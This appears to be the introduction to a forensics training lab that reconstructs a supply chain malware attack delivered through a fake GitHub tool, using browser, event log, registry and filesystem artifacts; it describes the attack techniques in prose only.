The RepoReaper Lab investigates a sophisticated supply chain attack targeting software developers through a weaponized open-source repository. The attack was first detected when a development team member downloaded what appeared to be a legitimate script-to-scene conversion tool from GitHub, only to unknowingly execute a multi-stage malware campaign. Within minutes of compilation, the malicious payload established persistence on the system, escalated privileges through a UAC bypass technique, and deployed encrypted components that operated entirely in memory. The attack demonstrated advanced evasion capabilities, including disabling Windows System Restore, masquerading as legitimate applications, and leveraging trusted system binaries to avoid detection by security tools.
In this lab, digital forensics techniques will be applied to reconstruct the complete attack timeline from initial access through command and control communication. Using artifacts from web browsers, Windows event logs, registry hives, and NTFS filesystem metadata, the investigation will uncover each stage of the attack chain. Students will analyze PowerShell script execution logs to identify malicious payloads, parse the Master File Table to track file system activities, examine scheduled tasks for persistence mechanisms, and investigate process hollowing techniques used for in-memory malware execution. The walkthrough will demonstrate how attackers abuse Electron applications as delivery mechanisms, exploit Living-Off-The-Land Binaries (LOLBins) for privilege escalation, and leverage legitimate communication platforms like Telegram for covert data exfiltration. Through this comprehensive analysis, the lab highlights the importance of multi-artifact correlation in incident response and the critical need for monitoring supply chain risks in mode